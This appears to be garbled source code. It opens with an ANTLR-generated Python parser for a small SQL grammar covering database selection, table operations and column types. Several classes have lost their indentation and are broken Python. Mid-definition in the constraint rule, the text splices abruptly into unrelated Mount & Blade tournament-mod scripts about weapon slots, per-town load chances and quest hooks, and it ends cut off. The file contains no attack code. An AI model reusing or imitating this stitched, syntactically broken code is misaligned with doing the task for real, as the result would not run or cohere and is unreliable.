    def __init__(self, parser, parent=None, invokingState=-1):
        super(SQLGramaticaParser.ShowDatabaseContext, self).__init__(parent, invokingState)
        self.parser = parser
    def SHOW(self):
        return self.getToken(SQLGramaticaParser.SHOW, 0)
    def DATABASES(self):
        return self.getToken(SQLGramaticaParser.DATABASES, 0)
    def getRuleIndex(self):
        return SQLGramaticaParser.RULE_showDatabase
    def enterRule(self, listener):
        if hasattr(listener, "enterShowDatabase"):
            listener.enterShowDatabase(self)
    def exitRule(self, listener):
        if hasattr(listener, "exitShowDatabase"):
            listener.exitShowDatabase(self)
    def accept(self, visitor):
        if hasattr(visitor, "visitShowDatabase"):
            return visitor.visitShowDatabase(self)
        else:
            return visitor.visitChildren(self)

def showDatabase(self):
    """Parse the `showDatabase` rule: SHOW DATABASES."""
    localctx = SQLGramaticaParser.ShowDatabaseContext(self, self._ctx, self.state)
    self.enterRule(localctx, 14, self.RULE_showDatabase)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 143
        self.match(SQLGramaticaParser.SHOW)
        self.state = 144
        self.match(SQLGramaticaParser.DATABASES)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class UseDatabaseContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `useDatabase` rule."""
    def __init__(self, parser, parent=None, invokingState=-1):
        super(SQLGramaticaParser.UseDatabaseContext, self).__init__(parent, invokingState)
        self.parser = parser
    def USE(self):
        return self.getToken(SQLGramaticaParser.USE, 0)
    def DATABASE(self):
        return self.getToken(SQLGramaticaParser.DATABASE, 0)
    def IDX(self):
        return self.getToken(SQLGramaticaParser.IDX, 0)
    def getRuleIndex(self):
        return SQLGramaticaParser.RULE_useDatabase
    def enterRule(self, listener):
        if hasattr(listener, "enterUseDatabase"):
            listener.enterUseDatabase(self)
    def exitRule(self, listener):
        if hasattr(listener, "exitUseDatabase"):
            listener.exitUseDatabase(self)
    def accept(self, visitor):
        if hasattr(visitor, "visitUseDatabase"):
            return visitor.visitUseDatabase(self)
        else:
            return visitor.visitChildren(self)

def useDatabase(self):
    """Parse the `useDatabase` rule: USE DATABASE <IDX>."""
    localctx = SQLGramaticaParser.UseDatabaseContext(self, self._ctx, self.state)
    self.enterRule(localctx, 16, self.RULE_useDatabase)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 146
        self.match(SQLGramaticaParser.USE)
        self.state = 147
        self.match(SQLGramaticaParser.DATABASE)
        self.state = 148
        self.match(SQLGramaticaParser.IDX)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class OpTableContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.OpTableContext, self).__init__(parent, invokingState)
self.parser = parser
def createTable(self):
return self.getTypedRuleContext(SQLGramaticaParser.CreateTableContext,0)
def alterTable(self):
return self.getTypedRuleContext(SQLGramaticaParser.AlterTableContext,0)
def dropTable(self):
return self.getTypedRuleContext(SQLGramaticaParser.DropTableContext,0)
def showTables(self):
return self.getTypedRuleContext(SQLGramaticaParser.ShowTablesContext,0)
def showColumns(self):
return self.getTypedRuleContext(SQLGramaticaParser.ShowColumnsContext,0)
def insertInto(self):
return self.getTypedRuleContext(SQLGramaticaParser.InsertIntoContext,0)
def updateSet(self):
return self.getTypedRuleContext(SQLGramaticaParser.UpdateSetContext,0)
def deleteFrom(self):
return self.getTypedRuleContext(SQLGramaticaParser.DeleteFromContext,0)
def selectFrom(self):
return self.getTypedRuleContext(SQLGramaticaParser.SelectFromContext,0)
def getRuleIndex(self):
return SQLGramaticaParser.RULE_opTable
def enterRule(self, listener):
if hasattr(listener, "enterOpTable"):
listener.enterOpTable(self)
def exitRule(self, listener):
if hasattr(listener, "exitOpTable"):
listener.exitOpTable(self)
def accept(self, visitor):
if hasattr(visitor, "visitOpTable"):
return visitor.visitOpTable(self)
else:
return visitor.visitChildren(self)
def opTable(self):
    """Parse the `opTable` rule: one of the table/data operations.

    Uses adaptive prediction (decision 7) to choose among CREATE/ALTER/
    DROP TABLE, SHOW TABLES, SHOW COLUMNS, INSERT, UPDATE, DELETE and
    SELECT, then delegates to that sub-rule.  (Indentation reconstructed
    per ANTLR Python-target codegen conventions.)
    """
    localctx = SQLGramaticaParser.OpTableContext(self, self._ctx, self.state)
    self.enterRule(localctx, 18, self.RULE_opTable)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 159
        self._errHandler.sync(self)
        # Decision point: let the ATN interpreter pick the alternative.
        la_ = self._interp.adaptivePredict(self._input,7,self._ctx)
        if la_ == 1:
            self.state = 150
            self.createTable()
            pass
        elif la_ == 2:
            self.state = 151
            self.alterTable()
            pass
        elif la_ == 3:
            self.state = 152
            self.dropTable()
            pass
        elif la_ == 4:
            self.state = 153
            self.showTables()
            pass
        elif la_ == 5:
            self.state = 154
            self.showColumns()
            pass
        elif la_ == 6:
            self.state = 155
            self.insertInto()
            pass
        elif la_ == 7:
            self.state = 156
            self.updateSet()
            pass
        elif la_ == 8:
            self.state = 157
            self.deleteFrom()
            pass
        elif la_ == 9:
            self.state = 158
            self.selectFrom()
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class TipoContext(ParserRuleContext):
    """Parse-tree context for the `tipo` (column data type) rule.

    ANTLR-generated.  Token accessors return the matched terminal
    node, or None when that token was not part of the alternative.
    """
    def __init__(self, parser, parent=None, invokingState=-1):
        super(SQLGramaticaParser.TipoContext, self).__init__(parent, invokingState)
        self.parser = parser
    def INT(self):
        return self.getToken(SQLGramaticaParser.INT, 0)
    def FLOAT(self):
        return self.getToken(SQLGramaticaParser.FLOAT, 0)
    def DATE(self):
        return self.getToken(SQLGramaticaParser.DATE, 0)
    def CHAR(self):
        return self.getToken(SQLGramaticaParser.CHAR, 0)
    def NUMX(self):
        return self.getToken(SQLGramaticaParser.NUMX, 0)
    def getRuleIndex(self):
        return SQLGramaticaParser.RULE_tipo
    def enterRule(self, listener):
        if hasattr(listener, "enterTipo"):
            listener.enterTipo(self)
    def exitRule(self, listener):
        if hasattr(listener, "exitTipo"):
            listener.exitTipo(self)
    def accept(self, visitor):
        if hasattr(visitor, "visitTipo"):
            return visitor.visitTipo(self)
        else:
            return visitor.visitChildren(self)
def tipo(self):
    """Parse the `tipo` rule: INT | FLOAT | DATE | CHAR '(' NUMX ')'.

    NOTE(review): T__2/T__3 are implicit literal tokens — presumably
    '(' and ')' — confirm against the .g4 grammar.
    (Indentation reconstructed per ANTLR codegen conventions.)
    """
    localctx = SQLGramaticaParser.TipoContext(self, self._ctx, self.state)
    self.enterRule(localctx, 20, self.RULE_tipo)
    try:
        self.state = 168
        self._errHandler.sync(self)
        # LL(1) decision on the next token.
        token = self._input.LA(1)
        if token in [SQLGramaticaParser.INT]:
            self.enterOuterAlt(localctx, 1)
            self.state = 161
            self.match(SQLGramaticaParser.INT)
            pass
        elif token in [SQLGramaticaParser.FLOAT]:
            self.enterOuterAlt(localctx, 2)
            self.state = 162
            self.match(SQLGramaticaParser.FLOAT)
            pass
        elif token in [SQLGramaticaParser.DATE]:
            self.enterOuterAlt(localctx, 3)
            self.state = 163
            self.match(SQLGramaticaParser.DATE)
            pass
        elif token in [SQLGramaticaParser.CHAR]:
            # CHAR takes a size argument: CHAR '(' NUMX ')'.
            self.enterOuterAlt(localctx, 4)
            self.state = 164
            self.match(SQLGramaticaParser.CHAR)
            self.state = 165
            self.match(SQLGramaticaParser.T__2)
            self.state = 166
            self.match(SQLGramaticaParser.NUMX)
            self.state = 167
            self.match(SQLGramaticaParser.T__3)
            pass
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class CreateTableContext(ParserRuleContext):
    """Parse-tree context for the `createTable` rule.

    ANTLR-generated.  Accessors taking an index `i` return a single
    child when `i` is given, otherwise the list of all matching
    children (tokens or sub-rule contexts).
    """
    def __init__(self, parser, parent=None, invokingState=-1):
        super(SQLGramaticaParser.CreateTableContext, self).__init__(parent, invokingState)
        self.parser = parser
    def CREATE(self):
        return self.getToken(SQLGramaticaParser.CREATE, 0)
    def TABLE(self):
        return self.getToken(SQLGramaticaParser.TABLE, 0)
    def IDX(self, i=None):
        # Identifiers: table name plus one per column definition.
        if i is None:
            return self.getTokens(SQLGramaticaParser.IDX)
        else:
            return self.getToken(SQLGramaticaParser.IDX, i)
    def tipo(self, i=None):
        # One `tipo` context per column definition.
        if i is None:
            return self.getTypedRuleContexts(SQLGramaticaParser.TipoContext)
        else:
            return self.getTypedRuleContext(SQLGramaticaParser.TipoContext,i)
    def CONSTRAINT(self, i=None):
        if i is None:
            return self.getTokens(SQLGramaticaParser.CONSTRAINT)
        else:
            return self.getToken(SQLGramaticaParser.CONSTRAINT, i)
    def constraint(self, i=None):
        if i is None:
            return self.getTypedRuleContexts(SQLGramaticaParser.ConstraintContext)
        else:
            return self.getTypedRuleContext(SQLGramaticaParser.ConstraintContext,i)
    def getRuleIndex(self):
        return SQLGramaticaParser.RULE_createTable
    def enterRule(self, listener):
        if hasattr(listener, "enterCreateTable"):
            listener.enterCreateTable(self)
    def exitRule(self, listener):
        if hasattr(listener, "exitCreateTable"):
            listener.exitCreateTable(self)
    def accept(self, visitor):
        if hasattr(visitor, "visitCreateTable"):
            return visitor.visitCreateTable(self)
        else:
            return visitor.visitChildren(self)
def createTable(self):
    """Parse the `createTable` rule:
    CREATE TABLE IDX '(' IDX tipo (',' IDX tipo)* (',' CONSTRAINT constraint)* ')'.

    NOTE(review): loop/branch nesting reconstructed from ANTLR
    Python-target codegen conventions and the ATN state numbering
    (states 184-194 belong to the optional constraint branch) — the
    original indentation was lost; confirm against regenerated output.
    """
    localctx = SQLGramaticaParser.CreateTableContext(self, self._ctx, self.state)
    self.enterRule(localctx, 22, self.RULE_createTable)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 170
        self.match(SQLGramaticaParser.CREATE)
        self.state = 171
        self.match(SQLGramaticaParser.TABLE)
        self.state = 172
        self.match(SQLGramaticaParser.IDX)
        self.state = 173
        self.match(SQLGramaticaParser.T__2)
        self.state = 174
        self.match(SQLGramaticaParser.IDX)
        self.state = 175
        self.tipo()
        self.state = 181
        self._errHandler.sync(self)
        # Additional column definitions: (',' IDX tipo)*, adaptive decision 9.
        _alt = self._interp.adaptivePredict(self._input,9,self._ctx)
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                self.state = 176
                self.match(SQLGramaticaParser.T__4)
                self.state = 177
                self.match(SQLGramaticaParser.IDX)
                self.state = 178
                self.tipo()
            self.state = 183
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,9,self._ctx)
        self.state = 195
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Optional trailing constraint list: (',' CONSTRAINT constraint)+.
        if _la==SQLGramaticaParser.T__4:
            self.state = 184
            self.match(SQLGramaticaParser.T__4)
            self.state = 185
            self.match(SQLGramaticaParser.CONSTRAINT)
            self.state = 186
            self.constraint()
            self.state = 192
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            while _la==SQLGramaticaParser.T__4:
                self.state = 187
                self.match(SQLGramaticaParser.T__4)
                self.state = 188
                self.match(SQLGramaticaParser.CONSTRAINT)
                self.state = 189
                self.constraint()
                self.state = 194
                self._errHandler.sync(self)
                _la = self._input.LA(1)
        self.state = 197
        self.match(SQLGramaticaParser.T__3)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ConstraintContext(ParserRuleContext):
def __init__(self, parser, parent=None, invokingState=-1):
super(SQLGramaticaParser.ConstraintContext, self).__init__(parent, invokingState)
self.parser = parser
def primaryKey(self):
return self.getTypedRuleContext(SQLGramaticaParser.PrimaryKeyContext,0)
def foreignKey(self, i=None):
# One Hand - 30 - 39
(assign, ":slot", tpe_weapons_onehand),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_default_onehand),
(val_add, ":slot", 1),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_onehand_1),
(val_add, ":slot", 1),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_onehand_2),
# Two Hand - 40 - 49
(assign, ":slot", tpe_weapons_twohand),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_default_twohand),
(val_add, ":slot", 1),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_twohand_1),
# (val_add, ":slot", 1),
# (troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_twohand_2),
# Crossbow - 50 - 59
(assign, ":slot", tpe_weapons_crossbow),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_default_crossbow),
# Throwing - 60 - 69
(assign, ":slot", tpe_weapons_throwing),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_default_javelin),
(val_add, ":slot", 1),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_throwing_1),
(val_add, ":slot", 1),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_throwing_2),
# Polearm - 70 - 79
(assign, ":slot", tpe_weapons_polearm),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_default_polearm),
(val_add, ":slot", 1),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_polearm_1),
# (val_add, ":slot", 1),
# (troop_set_slot, tpe_weapons, ":slot", wp_tpe_alt_polearm_2),
# Mount - 80 - 89
(assign, ":slot", tpe_weapons_mount),
(troop_set_slot, tpe_weapons, ":slot", wp_tpe_default_horse),
# Outfit - 90 - 99
(assign, ":slot", tpe_weapons_outfit),
(troop_set_slot, tpe_weapons, ":slot", "itm_red_tpe_tunic"),
]
),
# script_tpe_initialize_default_weapons
# Initialize the player settings for weapons in each center.
# Input: none
# Output: none
("tpe_initialize_default_weapons",
[
(try_for_range, ":center_no", towns_begin, towns_end),
(store_sub, ":slot_base", ":center_no", towns_begin),
(val_mul, ":slot_base", 10),
# Lances
(store_add, ":slot_no", ":slot_base", tdp_val_setting_lance),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_lance),
# Archery
(store_add, ":slot_no", ":slot_base", tdp_val_setting_archery),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_bow),
# One Handed
(store_add, ":slot_no", ":slot_base", tdp_val_setting_onehand),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_onehand),
# Two Handed
(store_add, ":slot_no", ":slot_base", tdp_val_setting_twohand),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_twohand),
# Crossbows
(store_add, ":slot_no", ":slot_base", tdp_val_setting_crossbow),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_crossbow),
# Throwing
(store_add, ":slot_no", ":slot_base", tdp_val_setting_throwing),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_javelin),
# Polearms
(store_add, ":slot_no", ":slot_base", tdp_val_setting_polearm),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_polearm),
# Mounts
(store_add, ":slot_no", ":slot_base", tdp_val_setting_horse),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_horse),
# Outfits
(store_add, ":slot_no", ":slot_base", tdp_val_setting_outfit),
(troop_set_slot, tpe_appearance, ":slot_no", wp_tpe_default_armor),
(try_end),
]),
# script_tpe_determine_real_chance
# Computes the effective (normalized) percentage chance of each weapon
# class for the tournament in "$tournament_town" and writes the values
# into the design-panel overlay labels.
# Input: none (reads "$tournament_town" and tpe_settings slots)
# Output: none (updates overlay text objects)
("tpe_determine_real_chance",
[
(store_sub, ":city_offset", "$tournament_town", towns_begin),
(store_mul, ":slot_base", ":city_offset", 10),
### MELEE WEAPONS ###
(store_add, ":slot_onehand", ":slot_base", tdp_val_setting_onehand),
(store_add, ":slot_twohand", ":slot_base", tdp_val_setting_twohand),
(store_add, ":slot_polearm", ":slot_base", tdp_val_setting_polearm),
(troop_get_slot, ":chance_onehand", tpe_settings, ":slot_onehand"),
(troop_get_slot, ":chance_twohand", tpe_settings, ":slot_twohand"),
(troop_get_slot, ":chance_polearm", tpe_settings, ":slot_polearm"),
(assign, ":total", ":chance_onehand"),
(val_add, ":total", ":chance_twohand"),
(val_add, ":total", ":chance_polearm"),
(val_max, ":total", 1), # Prevent Div/0 errors.
# One Hand
(store_mul, reg21, ":chance_onehand", 100),
(val_div, reg21, ":total"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_onehand),
(overlay_set_text, ":obj_text", "@{reg21}%"),
# Two Hand
(store_mul, reg21, ":chance_twohand", 100),
(val_div, reg21, ":total"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_twohand),
(overlay_set_text, ":obj_text", "@{reg21}%"),
# Polearm
(store_mul, reg21, ":chance_polearm", 100),
(val_div, reg21, ":total"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_polearm),
(overlay_set_text, ":obj_text", "@{reg21}%"),
### RANGED WEAPONS & LANCES ###
(store_add, ":slot_lance", ":slot_base", tdp_val_setting_lance),
(store_add, ":slot_archery", ":slot_base", tdp_val_setting_archery),
(store_add, ":slot_crossbow", ":slot_base", tdp_val_setting_crossbow),
(store_add, ":slot_throwing", ":slot_base", tdp_val_setting_throwing),
(troop_get_slot, ":chance_lance", tpe_settings, ":slot_lance"),
(troop_get_slot, ":chance_archery", tpe_settings, ":slot_archery"),
(troop_get_slot, ":chance_crossbow", tpe_settings, ":slot_crossbow"),
(troop_get_slot, ":chance_throwing", tpe_settings, ":slot_throwing"),
(assign, ":total", ":chance_lance"),
(val_add, ":total", ":chance_archery"),
(val_add, ":total", ":chance_crossbow"),
(val_add, ":total", ":chance_throwing"),
(val_max, ":total", 1), # Prevent Div/0 errors.
# Lance
(store_mul, reg21, ":chance_lance", 100),
(val_div, reg21, ":total"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_lance),
(overlay_set_text, ":obj_text", "@{reg21}%"),
# Archery
(store_mul, reg21, ":chance_archery", 100),
(val_div, reg21, ":total"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_archery),
(overlay_set_text, ":obj_text", "@{reg21}%"),
# Crossbow
(store_mul, reg21, ":chance_crossbow", 100),
(val_div, reg21, ":total"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_crossbow),
(overlay_set_text, ":obj_text", "@{reg21}%"),
# Throwing
(store_mul, reg21, ":chance_throwing", 100),
(val_div, reg21, ":total"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_throwing),
(overlay_set_text, ":obj_text", "@{reg21}%"),
### MOUNTS ###
(store_add, ":slot_horse", ":slot_base", tdp_val_setting_horse),
(troop_get_slot, reg21, tpe_settings, ":slot_horse"),
(troop_get_slot, ":obj_text", tdp_objects, tdp_obj_label_real_chance_of_mount),
(overlay_set_text, ":obj_text", "@{reg21}%"),
]),
# script_tpe_initialize_default_design_settings
# Initialize the default settings of load chances for one center.
# Input: center_no (script param 1)
# Output: none
("tpe_initialize_default_design_settings",
[
(store_script_param, ":center_no", 1),
(store_sub, ":slot_base", ":center_no", towns_begin),
(val_mul, ":slot_base", 10),
(try_for_range, ":setting_slot", tdp_val_setting_lance, tdp_val_setting_horse),
(store_add, ":slot_no", ":slot_base", ":setting_slot"),
(troop_set_slot, tpe_settings, ":slot_no", 100),
(try_end),
# Mounts
(store_add, ":slot_no", ":slot_base", tdp_val_setting_horse),
(troop_set_slot, tpe_settings, ":slot_no", 50),
(try_begin),
(eq, MOD_ARENA_OVERHAUL_INSTALLED, 1),
(party_set_slot, ":center_no", slot_town_arena_option, tpe_default_arena_scene),
(try_end),
]),
# script_tpe_initialize_native_design_settings
# Initialize the Native-flavoured load-chance settings for one center,
# based on which town it is.
# Input: center_no (script param 1)
# Output: none
("tpe_initialize_native_design_settings",
[
(store_script_param, ":center_no", 1),
(try_begin),
(eq, ":center_no", "p_town_1"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 0, 0, 50, 80, 0, 0, 0, 0), # Sargoth
(else_try),
(eq, ":center_no", "p_town_2"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 0, 0, 50, 80, 50, 0, 0, 0), # Tihr
(else_try),
(eq, ":center_no", "p_town_4"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 40, 80, 50, 20, 0, 0, 0, 0), # Suno
(else_try),
(eq, ":center_no", "p_town_6"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 100, 100, 0, 0, 0, 0, 0, 0), # Praven
(else_try),
(eq, ":center_no", "p_town_7"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 100, 0, 100, 0, 0, 0, 0, 0), # Uxkhal
(else_try),
(eq, ":center_no", "p_town_8"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 40, 80, 50, 20, 0, 0, 0, 0), # Reyvadin
(else_try),
(eq, ":center_no", "p_town_9"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 100, 50, 0, 0, 0, 20, 30, 0), # Khudan
(else_try),
(this_or_next|eq, ":center_no", "p_town_10"), # Tulga
(eq, ":center_no", "p_town_17"), # Ichamur
(call_script, "script_tpe_define_city_native_settings", ":center_no", 100, 0, 0, 0, 0, 40, 60, 0),
(else_try),
(eq, ":center_no", "p_town_11"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 100, 0, 50, 0, 0, 20, 30, 0), # Curaw
(else_try),
(eq, ":center_no", "p_town_12"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 40, 0, 0, 100, 0, 0, 0, 0), # Wercheg
(else_try),
(eq, ":center_no", "p_town_13"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 40, 80, 50, 20, 30, 0, 60, 0), # Rivacheg
(else_try),
(this_or_next|eq, ":center_no", "p_town_14"), # Halmar
(eq, ":center_no", "p_town_18"), # Narra
(call_script, "script_tpe_define_city_native_settings", ":center_no", 100, 50, 25, 0, 0, 30, 50, 0),
(else_try),
(this_or_next|eq, ":center_no", "p_town_5"), # Jelkala
(this_or_next|eq, ":center_no", "p_town_15"), # Yalen
(eq, ":center_no", "p_town_3"), # Veluca
(call_script, "script_tpe_define_city_native_settings", ":center_no", 25, 100, 60, 0, 30, 0, 30, 50),
(else_try),
(eq, ":center_no", "p_town_16"),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 40, 80, 50, 20, 40, 0, 0, 0), # Dhirim
(else_try),
(this_or_next|eq, ":center_no", "p_town_19"), # Shariz
(eq, ":center_no", "p_town_21"), # Ahmerrad
(call_script, "script_tpe_define_city_native_settings", ":center_no", 100, 40, 60, 0, 30, 30, 0, 0),
(else_try),
(this_or_next|eq, ":center_no", "p_town_20"), # Durquba
(eq, ":center_no", "p_town_22"), # Bariyye
(call_script, "script_tpe_define_city_native_settings", ":center_no", 50, 0, 60, 0, 30, 30, 0, 0),
(else_try),
(call_script, "script_tpe_define_city_native_settings", ":center_no", 50, 100, 100, 100, 100, 100, 100, 100), # Default Response
(try_end),
(party_set_slot, ":center_no", slot_town_arena_option, 0),
]),
# script_tpe_define_city_native_settings
# Store the given load-chance percentages into the settings slots of one center.
# Input: center_no, horse, lance, sword, axe, bow, javelin, mounted-bow,
#        crossbow/sword chances (script params 1-9)
# Output: none
("tpe_define_city_native_settings",
[
(store_script_param, ":center_no", 1),
(store_script_param, ":horse_chance", 2),
(store_script_param, ":lance_chance", 3),
(store_script_param, ":sword_chance", 4),
(store_script_param, ":axe_chance", 5),
(store_script_param, ":bow_chance", 6),
(store_script_param, ":javelin_chance", 7),
(store_script_param, ":mounted_bow_chance", 8),
(store_script_param, ":crossbow_sword_chance", 9),
# (store_script_param, ":armor_item_begin", 9),
# (store_script_param, ":helm_item_begin", 10),
(store_add, ":total_chance", ":sword_chance", ":axe_chance"),
(val_add, ":total_chance", ":crossbow_sword_chance"),
(val_min, ":total_chance", 100),
(val_add, ":bow_chance", ":mounted_bow_chance"),
(val_min, ":bow_chance", 100),
(store_sub, ":slot_base", ":center_no", towns_begin),
(val_mul, ":slot_base", 10),
# Lances
(store_add, ":slot_no", ":slot_base", tdp_val_setting_lance),
(troop_set_slot, tpe_settings, ":slot_no", ":lance_chance"),
# Archery
(store_add, ":slot_no", ":slot_base", tdp_val_setting_archery),
(troop_set_slot, tpe_settings, ":slot_no", ":bow_chance"),
# One Handed
(store_add, ":slot_no", ":slot_base", tdp_val_setting_onehand),
(troop_set_slot, tpe_settings, ":slot_no", ":total_chance"),
# Two Handed
(store_add, ":slot_no", ":slot_base", tdp_val_setting_twohand),
(troop_set_slot, tpe_settings, ":slot_no", ":total_chance"),
# Crossbows
(store_add, ":slot_no", ":slot_base", tdp_val_setting_crossbow),
(troop_set_slot, tpe_settings, ":slot_no", ":crossbow_sword_chance"),
# Throwing
(store_add, ":slot_no", ":slot_base", tdp_val_setting_throwing),
(troop_set_slot, tpe_settings, ":slot_no", ":javelin_chance"),
# Polearms
(store_add, ":slot_no", ":slot_base", tdp_val_setting_polearm),
(troop_set_slot, tpe_settings, ":slot_no", 0),
# Mounts
(store_add, ":slot_no", ":slot_base", tdp_val_setting_horse),
(troop_set_slot, tpe_settings, ":slot_no", ":horse_chance"),
# Outfits
(store_add, ":slot_no", ":slot_base", tdp_val_setting_outfit),
(troop_set_slot, tpe_settings, ":slot_no", 100),
]),
# END - TOURNAMENT DESIGN PANEL SCRIPTS
###########################################################################################################################
##### TOURNAMENT QUEST SCRIPTS #####
###########################################################################################################################
# script_cf_quest_floris_active_tournament_hook_1
# Causes the quest to register as being completed successfully if you enter the town the tournament is being held in while having the quest active and join the tournament.
# Input: none
# Output: none
("quest_floris_active_tournament_hook_1",
[
(try_begin),
(check_quest_active, "qst_floris_active_tournament"),
(neg|quest_slot_eq, "qst_floris_active_tournament", slot_quest_current_state, qp1_tournament_participated_in_tournament), # Prevents repeated reputation gains in the TPE menu.
(quest_slot_eq, "qst_floris_active_tournament", slot_quest_target_center, "$current_town"),
(try_begin),
(quest_slot_eq, "qst_floris_active_tournament", slot_quest_current_state, qp1_tournament_message_received), # You were invited to attend. Still need to meet with host.
(call_script, "script_succeed_quest", "qst_floris_active_tournament"),
(quest_set_slot, "qst_floris_active_tournament", slot_quest_current_state, qp1_tournament_participated_in_tournament),
(else_try),
(quest_slot_eq, "qst_floris_active_tournament", slot_quest_current_state, 0), # You were not invited to attend. Quest is automatically completed.
(call_script, "script_succeed_quest", "qst_floris_active_tournament"),
(complete_quest, "qst_floris_active_tournament"),
(try_end),
(ge, "$tpe_quest_reactions", TPE_QUEST_REACTIONS_HIGH),
(troop_slot_ge, "trp_player", slot_troop_renown, 200),
(call_script, "script_change_player_relation_with_center", "$current_town", 2),
(try_end),
]),
# END - TOURNAMENT QUEST SCRIPTS
# script_tpe_initialize_player_settings
# Initialize the player settings.
# Input: none
# Output: none
("tpe_initialize_player_settings",
[
(troop_set_slot, TPE_OPTIONS, tpe_val_opt_awards, 0),
(troop_set_slot, TPE_OPTIONS, tpe_val_diff_setting, 0),
(troop_set_slot, "trp_tpe_presobj", tpe_checkbox_opt_damage, 0),
(troop_set_slot, TPE_OPTIONS, tpe_val_level_scale, 0),
(troop_set_slot, "trp_player", slot_troop_tournament_team_request, 4),
(troop_set_slot, TPE_OPTIONS, tpe_val_show_health, 1),
(assign, "$g_wp_tpe_active", 1),
(assign, "$tpe_quests_active", 1),
(assign, "$tpe_quest_reactions", TPE_QUEST_REACTIONS_MEDIUM),
(assign, "$g_wp_tpe_renown_scaling", 1),
(assign, "$g_wp_tpe_option_icd_active", 1),
(call_script, "script_tpe_initialize_default_weapons"),
(try_for_range, ":center_no", towns_begin, towns_end),
(call_script, "script_tpe_initialize_default_design_settings", ":center_no"),
(try_end),
]),
# script_tpe_hook_switch_between_native_or_tpe
# Evaluates if TPE is activated and sends the player to the TPE or native menus.
# Input: none
# Output: none
("tpe_hook_switch_between_native_or_tpe",
[
(assign, "$g_tournament_cur_tier", 0),
(assign, "$g_tournament_player_team_won", -1),
(assign, "$g_tournament_bet_placed", 0),
(assign, "$g_tournament_bet_win_amount", 0),
(assign, "$g_tournament_last_bet_tier", -1),
(assign, "$g_tournament_next_num_teams", 0),
(assign, "$g_tournament_next_team_size", 0),
(try_begin),
(eq, "$g_wp_tpe_active", 0),
(call_script, "script_fill_tournament_participants_troop", "$current_town", 1),
(jump_to_menu, "mnu_town_tournament"),
(else_try),
(eq, "$g_wp_tpe_active", 1),
(call_script, "script_tpe_fill_tournament_participants_troop", "$current_town", 1),
(jump_to_menu, "mnu_tpe_town_tournament"),
(try_end),
]),
# script_tpe_store_town_faction_to_reg0
# Returns the faction number of a center under a number of different circumstances.
# Input: center_no (script param 1)
# Output: reg0 (faction id, or 0 if none could be determined)
("tpe_store_town_faction_to_reg0",
[
(store_script_param, ":center_no", 1),
(assign, ":faction_picked", 0),
(try_begin),
# Figure out faction based on center.
(store_faction_of_party, ":faction_no", ":center_no"),
(is_between, ":faction_no", kingdoms_begin, kingdoms_end),
(assign, ":faction_picked", ":faction_no"),
(ge, DEBUG_TPE_general, 1),
(str_store_faction_name, s21, ":faction_no"),
(str_store_party_name, s22, ":center_no"),
(display_message, "@DEBUG (TPE): Faction '{s21}' determined by '{s22}'."),
(else_try),
# Use the lord of the town if possible.
(eq, ":faction_picked", 0),
